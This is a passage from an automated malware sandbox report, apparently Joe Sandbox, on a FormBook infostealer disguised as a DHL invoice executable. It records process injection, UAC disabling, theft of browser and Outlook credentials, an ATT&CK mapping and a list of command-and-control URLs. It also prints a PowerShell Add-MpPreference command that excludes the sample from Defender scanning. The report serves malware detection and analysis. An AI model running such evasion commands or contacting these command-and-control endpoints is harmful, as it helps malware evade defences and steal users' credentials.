            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: NULL target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: NULL target: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: NULL target: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\wextract.exeThread register set: target process: 7688Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\wextract.exeThread APC queued: target process: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\regedit.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\regedit.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: A40008Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeProcess created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: rQkTBkrqhGpTBn.exe, 0000000C.00000000.2001742701.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139977533.0000000001091000.00000002.00000001.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141121954.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeQueries volume information: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disables UAC (registry)
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\wextract.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		512
            Process Injection            		1
            Modify Registry            		1
            OS Credential Dumping            		341
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		21
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		151
            Virtualization/Sandbox Evasion            		Security Account Manager151
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook512
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557059 Sample: dhl009544554961.INV.PEK.CO.... Startdate: 17/11/2024 Architecture: WINDOWS Score: 100 44 www.booosted.xyz 2->44 46 www.s9gzg9.vip 2->46 48 23 other IPs or domains 2->48 52 Suricata IDS alerts for network traffic 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 60 6 other signatures 2->60 10 dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe 1 3 2->10         started        signatures3 58 Performs DNS queries to domains with low reputation 44->58 process4 signatures5 64 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->66 68 Uses regedit.exe to modify the Windows registry 10->68 70 4 other signatures 10->70 13 csc.exe 10->13         started        16 powershell.exe 23 10->16         started        18 WerFault.exe 19 16 10->18         started        20 regedit.exe 10->20         started        process6 signatures7 72 Maps a DLL or memory area into another process 13->72 22 rQkTBkrqhGpTBn.exe 13->22 injected 74 Loading BitLocker PowerShell Module 16->74 25 WmiPrvSE.exe 16->25         started        27 conhost.exe 16->27         started        process8 signatures9 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 29 wextract.exe 13 22->29         started        process10 signatures11 76 Tries to steal Mail credentials (via file / registry access) 29->76 78 Tries to harvest and steal browser information (history, passwords, etc) 29->78 80 Modifies the context of a thread in another process (thread injection) 29->80 82 3 other signatures 29->82 32 rQkTBkrqhGpTBn.exe 29->32 injected 36 firefox.exe 29->36         started        process12 dnsIp13 38 rtpsilva4d.click 67.223.117.169, 50029, 50030, 50031 VIMRO-AS15189US United States 32->38 40 www.jagdud.store 209.74.64.187, 49869, 49884, 49900 MULTIBAND-NEWHOPEUS United States 32->40 42 6 other IPs or domains 32->42 50 Found direct / indirect Syscall (likely to bypass EDR) 32->50 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe47%ReversingLabsByteCode-MSIL.Trojan.Remcos
            dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe45%VirustotalBrowse
            dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            funddata-x.net0%VirustotalBrowse
            booosted.xyz1%VirustotalBrowse
            www.bejho.net1%VirustotalBrowse
            arcare.partners4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.s9gzg9.vip/5hlj/0%Avira URL Cloudsafe
            http://www.funddata-x.net/kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB0%Avira URL Cloudsafe
            http://www.bearableguy.net/37uf/0%Avira URL Cloudsafe
            http://www.bearableguy.net/37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c=0%Avira URL Cloudsafe
            http://www.nieuws-july202541.sbs/0bvv/0%Avira URL Cloudsafe
            http://www.bejho.net/zhgj/0%Avira URL Cloudsafe
            http://www.extrem.tech/ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM=0%Avira URL Cloudsafe
            http://www.bandukchi.com/d22y/0%Avira URL Cloudsafe
            https://nojs.domaincntrol.com0%Avira URL Cloudsafe
            http://www.gcast.video/9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB100%Avira URL Cloudmalware
            http://www.bejho.net/zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB0%Avira URL Cloudsafe
            http://www.gcast.video/9kvp/100%Avira URL Cloudmalware
            http://www.oneid.ink/wlyv/0%Avira URL Cloudsafe
            http://www.oneid.ink/wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB0%Avira URL Cloudsafe
            http://www.bandukchi.com/d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB0%Avira URL Cloudsafe
            http://www.everyone.golf/8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB0%Avira URL Cloudsafe
            http://www.booosted.xyz0%Avira URL Cloudsafe
            http://www.booosted.xyz/ndw1/0%Avira URL Cloudsafe
            http://www.funddata-x.net/kgqw/0%Avira URL Cloudsafe
            http://www.extrem.tech/ikn1/0%Avira URL Cloudsafe
            http://www.rtpsilva4d.click/e61w/0%Avira URL Cloudsafe
            http://www.nieuws-july202541.sbs/0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4=0%Avira URL Cloudsafe
            http://www.jagdud.store/ohf8/0%Avira URL Cloudsafe
            http://www.everyone.golf/8hrm/0%Avira URL Cloudsafe
